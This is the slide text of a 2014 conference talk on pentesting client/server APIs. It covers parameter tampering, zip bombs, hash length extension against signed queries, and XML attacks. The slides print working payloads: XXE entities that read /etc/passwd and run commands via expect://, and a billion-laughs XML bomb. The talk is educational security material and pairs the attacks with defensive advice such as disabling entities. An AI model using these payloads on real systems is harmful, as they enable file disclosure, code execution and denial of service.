Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

CodeFest 2014 - Pentesting client/server API

33,482 views

Published on

http://2014.codefest.ru/lecture/696

Published in: Technology, News & Politics
  • Be the first to comment

  • Be the first to like this

CodeFest 2014 - Pentesting client/server API

  1. 1. Pentesting client/server API Sergey Belov
  2. 2. $ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  3. 3. What are we talking about? © 2002—2014, Digital Security 3 API
  4. 4. What are we talking about? © 2002—2014, Digital Security 4 API
  5. 5. Hacking via API © 2002—2014, Digital Security 5
  6. 6. Hacking via API © 2002—2014, Digital Security 6
  7. 7. Hacking via API © 2002—2014, Digital Security 7 From interface to API methods
  8. 8. Hacking via API © 2002—2014, Digital Security 8
  9. 9. Hacking via API © 2002—2014, Digital Security 9
  10. 10. Hacking via API © 2002—2014, Digital Security 10
  11. 11. Hacking via API © 2002—2014, Digital Security 11
  12. 12. Hacking via API © 2002—2014, Digital Security 12 What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom implementation in API! Really
  13. 13. Hacking via API © 2002—2014, Digital Security 13
  14. 14. Hacking via API © 2002—2014, Digital Security 14 ZIP
  15. 15. Hacking via API © 2002—2014, Digital Security 15 42 Kb…
  16. 16. Hacking via API © 2002—2014, Digital Security 16 42 Kb… …10 Gb?
  17. 17. Hacking via API © 2002—2014, Digital Security 17 42 Kb… …10 Gb? …100 Gb?
  18. 18. Hacking via API © 2002—2014, Digital Security 18 42 Kb… …10 Gb? …100 Gb? …100 Tb?
  19. 19. Hacking via API © 2002—2014, Digital Security 19 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
  20. 20. Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
  21. 21. Hacking via API © 2002—2014, Digital Security 21 The evil of JavaScript and
  22. 22. Hacking via API © 2002—2014, Digital Security 22
  23. 23. Hacking via API © 2002—2014, Digital Security 23
  24. 24. Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
  25. 25. Hacking via API © 2002—2014, Digital Security 25 Crypto
  26. 26. Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) APIkey
  27. 27. Hacking via API © 2002—2014, Digital Security 27
  28. 28. Hacking via API © 2002—2014, Digital Security 28 But why?
  29. 29. Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack
  30. 30. Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
  31. 31. Hacking via API © 2002—2014, Digital Security 31 Some have hijacked just 1 request…
  32. 32. Hacking via API © 2002—2014, Digital Security 32 What does the attacker know? • Original data • Sign (token)
  33. 33. Hacking via API © 2002—2014, Digital Security 33 What does the attacker want? Change some data / change params
  34. 34. Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
  35. 35. Hacking via API © 2002—2014, Digital Security 35 Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
  36. 36. Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?
  37. 37. Hacking via API © 2002—2014, Digital Security 37
  38. 38. Hacking via API © 2002—2014, Digital Security 38
  39. 39. Hacking via API © 2002—2014, Digital Security 39
  40. 40. Hacking via API © 2002—2014, Digital Security 40
  41. 41. Hacking via API © 2002—2014, Digital Security 41
  42. 42. Hacking via API © 2002—2014, Digital Security 42
  43. 43. Hacking via API © 2002—2014, Digital Security 43
  44. 44. Hacking via API © 2002—2014, Digital Security 44
  45. 45. Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!
  46. 46. Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  47. 47. Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!
  48. 48. Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  49. 49. Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
  50. 50. Hacking via API © 2002—2014, Digital Security 50 XML Bombs!
  51. 51. Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  52. 52. What are we talking about? © 2002—2014, Digital Security 52 Man in the Middle
  53. 53. Hacking via API © 2002—2014, Digital Security 53 Examples?
  54. 54. Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
  55. 55. Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  56. 56. Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
  57. 57. Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
  58. 58. twitter.com/sergeybelove sbelov@dsec.ru Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 Hacking via API Thanks for your attention! Questions? © 2002—2014, Digital Security 58

×